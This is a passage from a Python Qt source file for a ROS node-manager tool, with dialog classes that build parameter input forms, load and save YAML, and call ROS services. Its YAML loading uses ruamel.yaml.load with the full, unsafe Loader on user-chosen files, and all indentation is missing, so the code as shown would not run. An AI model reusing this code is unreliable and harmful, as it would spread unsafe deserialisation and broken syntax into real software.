self._createFieldFromDict(value, clear_origin_value=clear_origin_value)
except Exception:
print(traceback.format_exc())
finally:
self.setUpdatesEnabled(True)
def _createFieldFromDict(self, value, layout=None, clear_origin_value=False):
if layout is None:
layout = self.param_widget.layout()
# sort the items: 1. header, 2. all primitives (sorted), 3. list, dict (sorted)
all_params = []
primitives = []
komplex = []
for name, val in value.items():
_type = type(val).__name__
if isinstance(val, dict):
if ':type' in val:
_type = val[':type']
elif ':value' in val:
_type = type(val[':value']).__name__
if _type == 'str':
_type = 'string'
if _type in ['std_msgs/Header']:
all_params.append((name, _type, val))
elif ParameterDescription.is_primitive_type(_type):
primitives.append((name, _type, val))
else:
komplex.append((name, _type, val))
all_params.extend(sorted(primitives))
all_params.extend(sorted(komplex))
# create widgets
for name, _type, val in all_params:
if name.startswith(':'):
continue
# search for existing field
field = self.getField(name)
if field is None:
# add parameter object first
param_desc = ParameterDescription(name, _type, val)
# create widget for parameter
field = param_desc.createTypedWidget(self)
if clear_origin_value:
param_desc.clear_origin_value()
param_desc.setWidget(field)
self.params.append(param_desc)
if isinstance(field, (GroupBox, ArrayBox)):
field.createFieldFromValue(val[':value'] if ':value' in val else val, clear_origin_value)
layout.addRow(field)
else:
# we have a simple parameter, create a label for it
label_name = name if _type in ['string', 'str', 'unicode', 'bool'] else '%s (%s)' % (name, _type)
label = QLabel(label_name, self)
label.setObjectName('%s_label' % name)
label.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding))
hint = field.toolTip()
if hint:
label.setToolTip(hint)
# whatsThis destroys the layout
# label.whatsThis(hint)
label.setBuddy(field)
layout.addRow(label, field)
else:
# field exists already -> update groups or arrays
if isinstance(field, (GroupBox, ArrayBox)):
field.createFieldFromValue(val[':value'] if ':value' in val else val, clear_origin_value)
else:
raise Exception("Parameter with name '%s' already exists!" % name)
def value(self, with_tags=False, only_changed=False):
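# Illustrative result (parameter names made up): {'rate': 10, 'frame': 'map'};
# with with_tags=True each primitive value is roughly wrapped as
# {'rate': {':value': 10, ':type': 'int', ...}, ...}.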
result = dict()
for param in self.params:
if not param.isBinaryType():
if param.isPrimitiveType():
val = param.value(with_tags=with_tags)
if param.changed() or not only_changed:
result[param.name()] = val
else:
val = param.value(with_tags=with_tags)
if val or not only_changed:
result[param.name()] = val
return result
def set_values(self, values):
'''
Sets the values for existing fields. Used e.g. while loading parameters from a file.
:param dict values: the dictionary with values to set.
:raise Exception: on errors
'''
if isinstance(values, dict):
for param, val in values.items():
value = val
_type = 'unknown'
if isinstance(val, tuple):
# backward compatibility
(_type, value) = val
elif isinstance(val, dict):
if ':value' in val:
value = val[':value']
if ':type' in val:
_type = val[':type']
field = self.getField(param)
if field is not None:
if isinstance(field, (GroupBox, ArrayBox)):
field.set_values(value)
else:
field.set_value(value)
elif isinstance(values, list):
raise Exception("Setting 'list' values in MainBox or GroupBox not supported!!!")
def getField(self, name, recursive=False):
for child in self.children():
for c in child.children():
if recursive and isinstance(c, MainBox):
result = c.getField(name, recursive=recursive)
if result is not None:
return result
elif c.objectName() == name:
return c
return None
def removeAllFields(self):
'''
Remove the references between parameters and their corresponding widgets
(ComboBox, CheckBox, ..) and remove these widgets from layouts.
'''
for child in self.param_widget.children():
if isinstance(child, MyComboBox):
child.parameter_description.setWidget(None)
self.params.remove(child.parameter_description)
elif isinstance(child, MainBox):
child.removeAllFields()
self.param_widget.layout().removeWidget(child)
def filter(self, arg, force_show=False):
'''
Hide the parameter input fields whose labels don't contain C{arg}.
:param str arg: the filter text
:param bool force_show: override filter, if group is shown
'''
result = False
for child in self.param_widget.children():
if isinstance(child, (MainBox, GroupBox, ArrayBox)):
show = force_show or not arg
if not show:
show = child.objectName().lower().find(arg) != -1
show = child.filter(arg, force_show=show) or show
# hide group, if no parameters are visible
child.setVisible(show)
if show:
child.setCollapsed(False)
result = True
elif isinstance(child, ValueWidget):
label = child.parentWidget().layout().labelForField(child)
if label is not None:
show = force_show or not arg
if not show:
show = child.current_text().lower().find(arg) != -1 or label.text().lower().find(arg) != -1
# set the parent group visible if it is not visible
if show and not child.parentWidget().isVisible():
child.parentWidget().setVisible(show)
label.setVisible(show)
child.setVisible(show)
if show:
result = True
return result
def setVisible(self, arg):
if arg and self.parentWidget() is not None and not self.parentWidget().isVisible():
self.parentWidget().setVisible(arg)
QWidget.setVisible(self, arg)
class GroupBox(MainBox):
'''
Groups the parameters of a dictionary, struct or class using a group box for
visualization.
'''
def __init__(self, name, param_type, parent=None):
MainBox.__init__(self, name, param_type, True, parent)
self.setObjectName(name)
class ArrayEntry(MainBox):
'''
A part of the ArrayBox to represent the elements of a list.
'''
def __init__(self, index, param_type, parent=None):
MainBox.__init__(self, '#%s' % utf8(index), param_type, True, parent)
self.index = index
self.setObjectName(''.join(['[', utf8(index), ']']))
self.param_widget.setFrameShape(QFrame.Box)
self.param_widget.setFrameShadow(QFrame.Plain)
self.type_label.setVisible(False)
# boxLayout = QFormLayout()
# boxLayout.setVerticalSpacing(0)
# label = QLabel(''.join(['[', str(index), ']']))
# self.param_widget.layout().addRow(label)
# self.setLayout(boxLayout)
def value(self, with_tags=False, only_changed=False):
'''
Returns a dictionary for an entry of an array, e.g. {name: value}.
If with_tags is True it looks like: {name: {':value': value, ':type': type}}
:rtype: dict
'''
result = dict()
for param in self.params:
val = param.value(with_tags)
if val or not only_changed:
result[param.name()] = val
return result
class ArrayBox(MainBox):
'''
Groups the parameters of a list.
'''
def __init__(self, name, param_type, dynamic, parent=None):
MainBox.__init__(self, name, param_type, True, parent)
self._is_dynamic = dynamic
self._dynamic_value = None
self._dynamic_widget = None
self._dynamic_items_count = 0
def addDynamicBox(self):
self._dynamic_items_count = 0
addButton = QPushButton("+")
addButton.setMaximumSize(25, 25)
addButton.clicked.connect(self._on_add_dynamic_entry)
self.options_layout.addWidget(addButton)
self.count_label = QLabel('0')
self.options_layout.addWidget(self.count_label)
remButton = QPushButton("-")
remButton.setMaximumSize(25, 25)
remButton.clicked.connect(self._on_rem_dynamic_entry)
self.options_layout.addWidget(remButton)
def _on_add_dynamic_entry(self, checked=False, value=None):
self.setUpdatesEnabled(False)
try:
val = value
if val is None:
val = self._dynamic_value
if val is not None:
self._create_dynamic_frame(val)
finally:
self.setUpdatesEnabled(True)
def _create_dynamic_frame(self, value):
entry_frame = ArrayEntry(self._dynamic_items_count, self.type_msg)
self.param_widget.layout().addRow(entry_frame)
entry_frame._createFieldFromDict(value)
self._dynamic_items_count += 1
self.count_label.setText(utf8(self._dynamic_items_count))
def _on_rem_dynamic_entry(self):
if self._dynamic_items_count > 0:
self._dynamic_items_count -= 1
item = self.param_widget.layout().takeAt(self._dynamic_items_count)
self.param_widget.layout().removeItem(item)
try:
# remove the referenced parameter, too
for child in item.widget().children():
if isinstance(child, MyComboBox):
child.parameter_description.setWidget(None)
self.params.remove(child.parameter_description)
elif isinstance(child, MainBox):
child.removeAllFields()
self.param_widget.layout().removeWidget(child)
child.parameter_description.setWidget(None)
self.params.remove(child.parameter_description)
item.widget().setParent(None)
del item
except Exception:
print(traceback.format_exc(3))
self.count_label.setText(utf8(self._dynamic_items_count))
def createFieldFromValue(self, value, clear_origin_value=False):
self.setUpdatesEnabled(False)
try:
if self._is_dynamic:
self.addDynamicBox()
# Set value used to add dynamic array fields.
# On republish the array is already filled, so only the last entry will be used when adding a new entry.
if isinstance(value, list):
if value:
self._dynamic_value = value[-1]
else:
self._dynamic_value = value
self.set_values(value)
except Exception:
print(traceback.format_exc())
finally:
self.setUpdatesEnabled(True)
def value(self, with_tags=False, only_changed=False):
'''
Goes through the list and creates a dictionary with the values of each element.
Returns a list with dictionaries, e.g. [{name: value}, {name: value}].
If with_tags is True the result is a dictionary, e.g. {':type': type[], ':value': [{name: value}, {name: value}]}
:rtype: list or dict, if with_tags==True
'''
result_list = list()
for i in range(self.param_widget.layout().rowCount()):
item = self.param_widget.layout().itemAt(i, QFormLayout.SpanningRole)
if item and isinstance(item.widget(), ArrayEntry):
value = item.widget().value(with_tags=with_tags, only_changed=only_changed)
result_list.append(value)
result = result_list
if with_tags:
result = {}
result[':type'] = self.type_msg
result[':value'] = result_list
return result
def set_values(self, values):
'''
Creates a list of the elements and sets their values.
:param list values: The list of dictionaries with parameter values
'''
if isinstance(values, list):
count_entries = 0
# determine the count of existing elements
for i in range(self.param_widget.layout().rowCount()):
item = self.param_widget.layout().itemAt(i, QFormLayout.SpanningRole)
if item and isinstance(item.widget(), ArrayEntry):
count_entries += 1
# create the list of the elements of the length of values
if count_entries < len(values):
for i in range(len(values) - count_entries):
# use array entry
self._on_add_dynamic_entry(value=values[i])
elif count_entries > len(values):
for i in range(count_entries - len(values)):
self._on_rem_dynamic_entry()
# set the values
for i in range(self.param_widget.layout().rowCount()):
item = self.param_widget.layout().itemAt(i, QFormLayout.SpanningRole)
if item and isinstance(item.widget(), ArrayEntry):
item.widget().set_values(values[i])
class ScrollArea(QScrollArea):
'''
ScrollArea limits the maximum width of the internal widget to the viewport width.
'''
def viewportEvent(self, arg):
if self.widget() and self.viewport().size().width() != self.widget().maximumWidth():
self.widget().setMaximumWidth(self.viewport().size().width())
return QScrollArea.viewportEvent(self, arg)
class ParameterDialog(QDialog):
'''
This dialog creates an input mask for the given parameters and their types.
'''
def __init__(self, params=dict(), buttons=QDialogButtonBox.Cancel | QDialogButtonBox.Ok, sidebar_var='', parent=None, store_geometry=''):
'''
Creates an input dialog.
:param dict params: a (recursive) dictionary with parameter names and their values.
A value can be of primitive type (int, bool, string), a list or dictionary. If it is
of list type, the list should contain dictionaries with parameters and values.
If value is of dictionary type it is a recursive include or value with tags.
If it is a recursive include a group will be created. The key is the name of the group.
If it is a value with tags it should contain at least a ':value' tag.
All attributes begin with ':'. Other key attributes:
-':type': type, overwrites the autodetection
-':ro': read only
-':hint': description of the parameter
-':default': default value
-':min': minimum value
-':max': maximum value
-':alt': a list of alternative values
-':path': 'dir' or 'file'
:param str sidebar_var: the name of the key in first level of params. Creates a sidebar if
it is not empty. Cached and alternative values are used to fill the sidebar.
'''
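# Illustrative params structure accepted by this dialog (names made up):
#   {'robot': {':type': 'string', ':value': 'pr2', ':hint': 'robot name'},
#    'rate': {':type': 'int', ':value': 10, ':min': 1, ':max': 100},
#    'options': {'use_sim_time': False}}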
QDialog.__init__(self, parent=parent)
self.setObjectName('ParameterDialog - %s' % utf8(params))
self.__current_path = nm.settings().current_dialog_path
self.horizontalLayout = QHBoxLayout(self)
self.horizontalLayout.setObjectName("horizontalLayout")
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setSpacing(0)
self.verticalLayout = QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.verticalLayout.setContentsMargins(3, 3, 3, 3)
# add filter row
self.filter_field = EnhancedLineEdit(self)
self.filter_field.setPlaceholderText("filter")
self.filter_field.textChanged.connect(self._on_filter_changed)
self.filter_visible = True
self.verticalLayout.addWidget(self.filter_field)
# create area for the parameter
self.scrollArea = scrollArea = ScrollArea(self)
scrollArea.setObjectName("scrollArea")
self.content = MainBox('/', 'string', False, self)
scrollArea.setFrameStyle(QFrame.NoFrame)
scrollArea.setWidget(self.content)
scrollArea.setWidgetResizable(True)
self.verticalLayout.addWidget(scrollArea)
# add info text field
self.info_field = QTextEdit(self)
palette = QPalette()
brush = QBrush(QColor(255, 254, 242))
brush.setStyle(Qt.SolidPattern)
palette.setBrush(QPalette.Active, QPalette.Base, brush)
brush = QBrush(QColor(255, 254, 242))
brush.setStyle(Qt.SolidPattern)
palette.setBrush(QPalette.Inactive, QPalette.Base, brush)
brush = QBrush(QColor(244, 244, 244))
brush.setStyle(Qt.SolidPattern)
palette.setBrush(QPalette.Disabled, QPalette.Base, brush)
self.info_field.setPalette(palette)
self.info_field.setFrameShadow(QFrame.Plain)
self.info_field.setReadOnly(True)
self.info_field.setTextInteractionFlags(Qt.LinksAccessibleByKeyboard | Qt.LinksAccessibleByMouse | Qt.TextBrowserInteraction | Qt.TextSelectableByKeyboard | Qt.TextSelectableByMouse)
self.info_field.setObjectName("dialog_info_field")
self.verticalLayout.addWidget(self.info_field)
self.info_field.setVisible(False)
# create buttons
self.buttonBox = QDialogButtonBox(self)
self.buttonBox.setObjectName("buttonBox")
self.buttonBox.setOrientation(Qt.Horizontal)
self.buttonBox.setStandardButtons(buttons)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
self.verticalLayout.addWidget(self.buttonBox)
self.horizontalLayout.addLayout(self.verticalLayout)
# add side bar for checklist
values = nm.history().cachedParamValues('/%s' % sidebar_var)
self.sidebar_frame = QFrame(self)
self.sidebar_frame.setObjectName(sidebar_var)
sidebarframe_verticalLayout = QVBoxLayout(self.sidebar_frame)
sidebarframe_verticalLayout.setObjectName("sidebarframe_verticalLayout")
sidebarframe_verticalLayout.setContentsMargins(3, 3, 3, 3)
self._sidebar_selected = 0
if len(values) > 0 and sidebar_var in params:
self.horizontalLayout.addWidget(self.sidebar_frame)
try:
if ':value' in params[sidebar_var]:
self.sidebar_default_val = params[sidebar_var][':value']
else:
self.sidebar_default_val = params[sidebar_var][1]
# add default value to sidebar
if self.sidebar_default_val and self.sidebar_default_val not in values:
values.append(self.sidebar_default_val)
except Exception:
self.sidebar_default_val = ''
values.sort()
for v in values:
checkbox = QCheckBox(v)
checkbox.setObjectName(v)
checkbox.stateChanged.connect(self._on_sidebar_stateChanged)
self.sidebar_frame.layout().addWidget(checkbox)
self.sidebar_frame.layout().addItem(QSpacerItem(100, 20, QSizePolicy.Minimum, QSizePolicy.Expanding))
# set the input fields
if params:
try:
self.content.createFieldFromValue(params)
self.setInfoActive(False)
except Exception:
print(traceback.format_exc())
if self.filter_field.isVisible():
self.filter_field.setFocus()
# restore from configuration file
self._geometry_name = store_geometry
if store_geometry and nm.settings().store_geometry:
settings = nm.settings().qsettings(nm.settings().CFG_GUI_FILE)
self._history_selected_robot = settings.value("selected_robot", '')
settings.beginGroup(store_geometry)
self.resize(settings.value("size", QSize(600, 300)))
pos = settings.value("pos", QPoint(0, 0))
if pos.x() != 0 and pos.y() != 0:
self.move(pos)
settings.endGroup()
def __del__(self):
self.content.removeAllFields()
def _on_sidebar_stateChanged(self, state):
if state == Qt.Checked:
self._sidebar_selected += 1
elif state == Qt.Unchecked:
self._sidebar_selected -= 1
if self._sidebar_selected in [0, 1]:
try:
field = self.content.getField(self.sidebar_frame.objectName())
if field is not None and field.currentText() == self.sidebar_default_val:
field.setEnabled(self._sidebar_selected == 0)
except Exception:
pass
def showLoadSaveButtons(self):
self.load_button = QPushButton()
self.load_button.setIcon(QIcon(':/icons/load.png'))
self.load_button.clicked.connect(self._load_parameter)
self.load_button.setToolTip('Load parameters from YAML file')
self.load_button.setFlat(True)
self.buttonBox.addButton(self.load_button, QDialogButtonBox.ActionRole)
self.save_button = QPushButton()
self.save_button.clicked.connect(self._save_parameter)
self.save_button.setIcon(QIcon(':/icons/save.png'))
self.save_button.setToolTip('Save parameters to YAML file')
self.save_button.setFlat(True)
self.buttonBox.addButton(self.save_button, QDialogButtonBox.ActionRole)
def _on_filter_changed(self):
self.content.filter(self.filter_field.text().lower())
def setFilterVisible(self, val):
'''
Shows or hides the filter row.
'''
self.filter_visible = val
self.filter_field.setVisible(val & self.scrollArea.isHidden())
def add_warning(self, message):
label = QLabel(self)
label.setWordWrap(True)
label.setText(''.join(["<font color='red'>Warning!\n", message, "</font>"]))
self.verticalLayout.insertWidget(1, label)
def setText(self, text):
'''
Adds a label to the dialog's layout and shows the given text.
:param str text: the text to add to the dialog
'''
self.info_field.setText(text)
self.setInfoActive(True)
def setInfoActive(self, val):
'''
Activates or deactivates the info field of this dialog. If info field is
activated, the filter frame and the input field are deactivated.
:param bool val: state
'''
if val and self.info_field.isHidden():
self.filter_field.setVisible(False & self.filter_visible)
self.scrollArea.setVisible(False)
self.info_field.setVisible(True)
elif not val and self.scrollArea.isHidden():
self.filter_field.setVisible(True & self.filter_visible)
self.scrollArea.setVisible(True)
self.info_field.setVisible(False)
if self.filter_field.isVisible():
self.filter_field.setFocus()
def setFocusField(self, field_label):
field = self.content.getField(field_label, recursive=True)
if field is not None:
field.setFocus()
def getKeywords(self, only_changed=False, with_tags=False):
'''
:param bool only_changed: returns changed parameters only (Default: False)
:param bool with_tags: returns parameter attributes (e.g. :ro, :hint, ...) (Default: False)
:returns: a dictionary with parameters and values for the entered fields.
:rtype: dict
'''
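# Illustrative result (names made up): {'robot': 'pr2', 'rate': 10};
# with with_tags=True each value is wrapped, e.g. {'rate': {':value': 10, ':type': 'int'}}.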
# get the results of sidebar
sidebar_list = []
sidebar_name = self.sidebar_frame.objectName()
for j in range(self.sidebar_frame.layout().count() - 1):
w = self.sidebar_frame.layout().itemAt(j).widget()
if isinstance(w, QCheckBox):
if w.checkState() == Qt.Checked:
sidebar_list.append(w.objectName())
result_value = self.content.value(with_tags, only_changed)
# add the sidebar results
if sidebar_name in result_value:
# skip the default value, if elements are selected in the sidebar
sidebar_value = ''
if with_tags:
sidebar_value = result_value[sidebar_name][':value']
else:
sidebar_value = result_value[sidebar_name]
if len(sidebar_list) == 0 or self.sidebar_default_val != sidebar_value:
sidebar_list.append(sidebar_value)
if with_tags:
result_value[sidebar_name][':value'] = [v for v in set(sidebar_list)]
else:
result_value[sidebar_name] = [v for v in set(sidebar_list)]
return result_value
def keywords2params(self, keywords):
'''
Resolves the dictionary values to ROS parameter names.
:param keywords: the result of the getKeywords
:return: dictionary of (ROS parameter name : value)
'''
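# Illustrative example (names made up):
#   keywords2params({'move_base': {'rate': 10}, 'use_sim_time': True})
#   -> {'move_base/rate': 10, 'use_sim_time': True}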
result = dict()
for param, value in keywords.items():
if isinstance(value, dict):
r = self.keywords2params(value)
for p, v in r.items():
result[roslib.names.ns_join(param, p)] = v
else:
result[param] = value
return result
@classmethod
def remove_attributes(cls, keywords):
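# Illustrative example (keys made up):
#   remove_attributes({'rate': {':value': 10, ':type': 'int'}, 'frame': 'map'})
#   -> {'rate': 10, 'frame': 'map'}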
# if it is a value dictionary, we need only the ':value' attribute
if ':value' in keywords:
return keywords[':value']
# remove all attributes which start with ':'
result = {}
for key, val in keywords.items():
clean_val = val
if isinstance(val, dict):
clean_val = cls.remove_attributes(val)
if not key.startswith(':'):
result[key] = clean_val
return result
def _save_parameter(self):
try:
(fileName, _) = QFileDialog.getSaveFileName(self,
"Save parameter",
self.__current_path,
"YAML files (*.yaml);;All files (*)")
if fileName:
self.__current_path = os.path.dirname(fileName)
nm.settings().current_dialog_path = os.path.dirname(fileName)
content = self.content.value(with_tags=True)
buf = ruamel.yaml.compat.StringIO()
ruamel.yaml.dump(content, buf, Dumper=ruamel.yaml.RoundTripDumper)
with open(fileName, 'w+') as f:
f.write(buf.getvalue())
except Exception as e:
print(traceback.format_exc(3))
MessageBox.warning(self, "Save parameter Error",
'Error while saving parameter',
utf8(e))
def _load_parameter(self):
try:
(fileName, _) = QFileDialog.getOpenFileName(self, "Load parameter",
self.__current_path,
"YAML files (*.yaml);;All files (*)")
if fileName:
self.__current_path = os.path.dirname(fileName)
nm.settings().current_dialog_path = os.path.dirname(fileName)
with open(fileName, 'r') as f:
# print yaml.load(f.read())
self.content.set_values(ruamel.yaml.load(f.read(), Loader=ruamel.yaml.Loader))
except Exception as e:
print(traceback.format_exc())
MessageBox.warning(self, "Load parameter Error",
'Error while loading parameter',
utf8(e))
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%%%%%%% close handling %%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def _store_geometry(self):
if self._geometry_name:
settings = nm.settings().qsettings(nm.settings().CFG_GUI_FILE)
settings.beginGroup(self._geometry_name)
settings.setValue("size", self.size())
settings.setValue("pos", self.pos())
settings.endGroup()
def accept(self):
self._store_geometry()
self.setResult(QDialog.Accepted)
self.accepted.emit()
if self.isModal():
self.hide()
def reject(self):
self._store_geometry()
self.setResult(QDialog.Rejected)
self.rejected.emit()
self.hide()
def hideEvent(self, event):
self.close()
def closeEvent(self, event):
'''
Mark the dialog for deletion on close; ignore the close event if the dialog was accepted.
'''
self.setAttribute(Qt.WA_DeleteOnClose, True)
if self.result() == QDialog.Accepted:
event.setAccepted(False)
QDialog.closeEvent(self, event)
class MasterParameterDialog(ParameterDialog):
'''
This dialog is an extension to the L{ParameterDialog}. The parameters and their
values are requested from the ROS master parameter server. The requests are
threaded, as are the changes to the ROS parameters assigned to the given
namespace.
'''
def __init__(self, masteruri, ns='/', parent=None, store_geometry=''):
'''
:param str masteruri: if the master uri is not None, the parameters are retrieved from the ROS parameter server.
:param str ns: namespace of the parameters retrieved from the ROS parameter server.
'''
ParameterDialog.__init__(self, dict(), parent=parent, store_geometry=store_geometry)
self.masteruri = masteruri
self.ns = ns
self.is_delivered = False
self.is_send = False
self.mIcon = QIcon(":/icons/default_cfg.png")
self.setWindowIcon(self.mIcon)
# self.resize(450, 300)
self.add_new_button = QPushButton()
self.add_new_button.setIcon(QIcon(':/icons/crystal_clear_add.png'))
self.add_new_button.clicked.connect(self._on_add_parameter)
self.add_new_button.setToolTip('Adds a new parameter to the list')
self.add_new_button.setFlat(True)
self.buttonBox.addButton(self.add_new_button, QDialogButtonBox.ActionRole)
self.showLoadSaveButtons()
# self.apply_button = QPushButton(self.tr("&Ok"))
# self.apply_button.clicked.connect(self._on_apply)
# self.buttonBox.addButton(self.apply_button, QDialogButtonBox.ApplyRole)
# self.buttonBox.accepted.connect(self._on_apply)
self.setText(' '.join(['Obtaining parameters from the parameter server', masteruri, '...']))
self.parameterHandler = ParameterHandler()
self.parameterHandler.parameter_list_signal.connect(self._on_param_list)
self.parameterHandler.parameter_values_signal.connect(self._on_param_values)
self.parameterHandler.delivery_result_signal.connect(self._on_delivered_values)
self.parameterHandler.requestParameterList(masteruri, ns)
# self.apply_button.setFocus(Qt.OtherFocusReason)
def accept(self):
if self.masteruri is not None and not self.is_send:
try:
params = self.getKeywords(True)
params = self.keywords2params(params)
ros_params = dict()
for p, v in params.items():
rospy.logdebug("updated parameter: %s, %s, %s", p, utf8(v), type(v))
ros_params[roslib.names.ns_join(self.ns, p)] = v
if ros_params:
self.is_send = True
self.setText('Sending parameters to the server...')
self.parameterHandler.deliverParameter(self.masteruri, ros_params)
else:
self.close()
except Exception as e:
print(traceback.format_exc(3))
MessageBox.warning(self, self.tr("Warning"), utf8(e))
elif self.masteruri is None:
MessageBox.warning(self, self.tr("Error"), 'Invalid ROS master URI')
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%%%%%%% ROS parameter handling %%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def _on_add_parameter(self):
params_arg = {'namespace': {':type': 'string', ':value': self.ns},
'name': {':type': 'string', ':value': ''},
'type': {':type': 'string', ':value': ['string', 'int', 'float', 'bool', 'list']},
'value': {':type': 'string', ':value': ''}
}
dia = ParameterDialog(params_arg, store_geometry='add_parameter_in_master_dialog')
dia.setWindowTitle('Add new parameter')
dia.setFilterVisible(False)
if dia.exec_():
try:
params = dia.getKeywords()
if params['name']:
if params['type'] == 'int':
value = int(params['value'])
elif params['type'] == 'float':
value = float(params['value'])
elif params['type'] == 'bool':
value = str2bool(params['value'])
elif params['type'] == 'list':
try:
value = ruamel.yaml.load("[%s]" % params['value'], Loader=ruamel.yaml.Loader)
# if there is no YAML, load() will return
# None. We want an empty list instead for
# our representation of empty.
if value is None:
value = []
except ruamel.yaml.MarkedYAMLError as e:
MessageBox.warning(self, self.tr("Warning"), "yaml error: %s" % utf8(e))
else:
value = params['value']
self._on_param_values(self.masteruri, 1, '', {roslib.names.ns_join(params['namespace'], params['name']): (1, '', value)}, new_param=True)
else:
MessageBox.warning(self, self.tr("Warning"), 'Empty name is not valid!')
except ValueError as e:
print(traceback.format_exc(3))
MessageBox.warning(self, self.tr("Warning"), utf8(e))
def _on_param_list(self, masteruri, code, msg, params):
'''
:param str masteruri: The URI of the ROS parameter server
:param int code: The return code of the request. If not 1, the message is set and the list can be ignored.
:param str msg: The message of the result.
:param [str] params: The list of parameter names.
'''
if code == 1:
params.sort()
self.parameterHandler.requestParameterValues(masteruri, params)
else:
self.setText(msg)
def _on_param_values(self, masteruri, code, msg, params, new_param=False):
'''
:param str masteruri: The URI of the ROS parameter server
:param int code: The return code of the request. If not 1, the message is set and the list can be ignored.
:param str msg: The message of the result.
:param params: The dictionary of parameter names and request results.
:type params: dict(paramName : (code, statusMessage, parameterValue))
'''
if code == 1:
dia_params = dict()
for p, (code_n, _, val) in params.items(): # _:=msg_n
if code_n != 1:
val = ''
type_str = 'string'
value = utf8(val)
if isinstance(val, bool):
type_str = 'bool'
elif isinstance(val, int):
type_str = 'int'
elif isinstance(val, float):
type_str = 'float'
elif isinstance(val, list) or isinstance(val, dict):
# handle representation of `rosparam`
type_str = 'list'
value = ''
for v in val:
if len(value) > 0:
value = value + ', '
value = value + utf8(v)
elif isinstance(val, Binary):
type_str = 'binary'
param = p.replace(self.ns, '')
param = param.strip(roslib.names.SEP)
names_sep = param.split(roslib.names.SEP)
param_name = names_sep.pop()
if names_sep:
group = dia_params
for n in names_sep:
group_name = n
if group_name in group:
group = group[group_name]
else:
tmp_dict = dict()
group[group_name] = tmp_dict
group = tmp_dict
group[param_name] = {':type': type_str, ':value': value}
else:
dia_params[param_name] = {':type': type_str, ':value': value}
try:
self.content.createFieldFromValue(dia_params, clear_origin_value=new_param)
self.setInfoActive(False)
except Exception as e:
print(traceback.format_exc(3))
MessageBox.warning(self, self.tr("Warning"), utf8(e))
else:
self.setText(msg)
def _on_delivered_values(self, masteruri, code, msg, params):
'''
:param str masteruri: The URI of the ROS parameter server
:param int code: The return code of the request. If not 1, the message is set and the list can be ignored.
:param str msg: The message of the result.
:param params: The dictionary of parameter names and request results.
:type params: dict(paramName : (code, statusMessage, parameterValue))
'''
self.is_delivered = True
errmsg = ''
if code == 1:
for _, (code_n, msg, _) in params.items(): # _:=param, val
if code_n != 1:
errmsg = '\n'.join([errmsg, msg])
else:
errmsg = msg if msg else 'Unknown error on set parameter'
if errmsg:
print(traceback.format_exc(2))
MessageBox.warning(self, self.tr("Warning"), utf8(errmsg))
self.is_delivered = False
self.is_send = False
self.setInfoActive(False)
if self.is_delivered:
self.close()
class ServiceDialog(ParameterDialog):
'''
Adds support for calling a service to the L{ParameterDialog}. The needed
input fields are created from the service request message type. The service
call is executed in a thread to avoid blocking the GUI.
'''
service_resp_signal = Signal(str, str)
def __init__(self, service, parent=None):
'''
:param service: Service to call.
:type service: U{fkie_master_discovery.ServiceInfo<http://docs.ros.org/kinetic/api/fkie_master_discovery/html/modules.html#fkie_master_discovery.master_info.ServiceInfo>}
'''
self.service = service
slots = service.get_service_class(True)._request_class.__slots__
types = service.get_service_class()._request_class._slot_types
ParameterDialog.__init__(self, self._params_from_slots(slots, types), buttons=QDialogButtonBox.Close, parent=parent, store_geometry='service_call_dialog')
self.setWindowTitle('Call %s' % service.name)
self.service_resp_signal.connect(self._handle_resp)
# self.resize(450, 300)
if not slots:
self.setText(''.join(['Wait for response ...']))
thread = threading.Thread(target=self._callService)
thread.setDaemon(True)
thread.start()
else:
self.call_service_button = QPushButton(self.tr("&Call"))
self.call_service_button.clicked.connect(self._on_call_service)
self.buttonBox.addButton(self.call_service_button, QDialogButtonBox.ActionRole)
self.hide_button = QPushButton(self.tr("&Hide/Show output"))
self.hide_button.clicked.connect(self._on_hide_output)
self.buttonBox.addButton(self.hide_button, QDialogButtonBox.ActionRole)
self.hide_button.setVisible(False)
self.showLoadSaveButtons()
def _on_hide_output(self):
self.setInfoActive(not self.info_field.isVisible())
def _on_call_service(self):
try:
self.hide_button.setVisible(True)
params = self.getKeywords()
self.setText(''.join(['Wait for response ...']))
thread = threading.Thread(target=self._callService, args=(params,))
thread.setDaemon(True)
thread.start()
except Exception as e:
rospy.logwarn("Error while reading parameter for %s service: %s", utf8(self.service.name), utf8(e))
self.setText(''.join(['Error while reading parameter:\n', utf8(e)]))
def _callService(self, params={}):
req = utf8(params) if params else ''
try:
req, resp = nm.starter().callService(self.service.uri, self.service.name, self.service.get_service_class(), [params])
self.service_resp_signal.emit(utf8(repr(req)), utf8(repr(resp)))
except Exception as e:
print(traceback.format_exc(2))
rospy.logwarn("Error while call service '%s': %s", utf8(self.service.name), utf8(e))
self.service_resp_signal.emit(utf8(repr(req)), utf8(e))
@classmethod
def _params_from_slots(cls, slots, types, values={}):
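# Builds the (recursive) params dict for ParameterDialog from the slots of a
# request class. Illustrative example: for a std_srvs/SetBool request
# (slots=['data'], types=['bool']) the result is
#   {'data': {':type': 'bool', ':value': ''}}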
result = dict()
for slot, msg_type in zip(slots, types):
base_type, is_array, _array_length = roslib.msgs.parse_type(msg_type)
if base_type in roslib.msgs.PRIMITIVE_TYPES or base_type in ['time', 'duration']:
default_value = 'now' if base_type in ['time', 'duration'] else ''
if slot in values and values[slot]:
default_value = values[slot]
result[slot] = {':type': msg_type, ':value': default_value}
else:
try:
list_msg_class = roslib.message.get_message_class(base_type)
if is_array and slot in values:
subresult = []
for slot_value in values[slot]:
subvalue = cls._params_from_slots(list_msg_class.__slots__, list_msg_class._slot_types, slot_value if slot in values and slot_value else {})
subresult.append(subvalue)
